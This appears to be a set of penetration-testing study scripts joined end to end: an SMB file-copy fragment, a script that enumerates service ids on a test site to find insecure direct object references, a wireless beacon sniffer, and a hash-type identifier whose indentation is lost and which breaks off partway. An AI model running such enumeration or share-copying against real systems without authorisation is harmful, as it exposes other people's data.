
    def download(self, remote_file_path, target_dir):
        """Recursively copy a file/directory off the share into a local dir."""
        logging.info("Copying %s to %s", remote_file_path, target_dir)
        self.shell_exec_monitor(
            session=self.session, command="cp -r {} {}".format(remote_file_path, target_dir), plugin_info=dict()
        )


smb = SMB()
| 34.898876 | 119 | 0.60645 |
import mechanize

# Base endpoint; the numeric service id parameter is what we enumerate to
# probe for Insecure Direct Object References.
url = "http://www.webscantest.com/business/access.php?serviceid="
attackNumber = 1

for i in range(5):
    res = mechanize.urlopen(url + str(i))
    content = res.read()
    # BUG FIX: the original tested `content.find("You service") > 0`, which
    # silently misses a match at index 0; a substring membership test is the
    # intended check.
    if "You service" in content:
        print("Possible Direct Object Reference")
        # Save the leaked response body for later inspection.
        with open('response/' + str(attackNumber) + '.txt', 'w') as output:
            output.write(content)
    print(attackNumber)
    attackNumber += 1
| 24.157895 | 65 | 0.656184 |
from scapy.all import *

# BSSIDs of access points seen so far, so each beacon is reported only once.
# BUG FIX: the original named this list `ssid` but the callback appended to
# an undefined `ap_list`, raising NameError on the first beacon.
ap_list = []


def parseSSID(pkt):
    """sniff() callback: dump each 802.11 frame and report new beacon SSIDs."""
    if pkt.haslayer(Dot11):
        print(pkt.show())
        # type 0 / subtype 8 == 802.11 management frame, beacon.
        if pkt.type == 0 and pkt.subtype == 8:
            if pkt.addr2 not in ap_list:
                ap_list.append(pkt.addr2)
                # BUG FIX: was print("SSID: pkt.info") — a literal string.
                print("SSID: " + str(pkt.info))


# BUG FIX: the original passed prn=ssid (a list), so the callback never ran;
# prn must be the callable invoked per captured packet.
sniff(iface='en0', prn=parseSSID, count=10, timeout=3, store=0)
| 25.153846 | 58 | 0.557522 |
Penetration-Testing-Study-Notes | #!/usr/bin/env python
logo=''' #########################################################################
# modified, adapted and encreased for www.marcoramilli.blogspot.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", 
"106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower()  -> all-lowercase string
# hash.isdigit()  -> all-numeric string
# hash.isalpha()  -> all-letter string
# hash.isalnum()  -> alphanumeric string
def CRC16():
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT():
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16():
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32():
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32():
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B():
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32():
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323():
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325():
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix():
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half():
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle():
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL():
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials():
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128():
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC():
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2():
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC():
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4():
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC():
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5():
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC():
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress():
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM():
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x():
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128():
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC():
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128():
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC():
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128():
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC():
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt():
hs='5634cc3b922578434d6e9342ff5913f7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass():
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass():
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt():
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername():
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass():
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt():
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt():
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass():
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt():
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass():
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass():
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt():
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass():
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt():
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt():
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass():
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass():
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt():
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass():
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass():
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass():
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass():
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass():
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass():
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass():
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4():
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3():
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix():
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress():
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR():
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160():
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC():
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5():
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit():
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160():
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC():
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1():
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC():
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS():
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2():
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160():
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC():
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt():
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass():
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass():
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt():
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass():
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass():
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass():
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt():
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass():
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt():
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass():
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass():
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt():
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03():
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass():
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass():
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass():
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192():
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC():
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192():
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC():
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1():
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django():
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224():
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC():
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224():
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC():
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256():
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC():
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256():
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC():
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194():
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256():
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC():
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256():
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC():
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass():
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass():
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2():
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM():
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django():
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320():
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC():
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384():
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC():
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
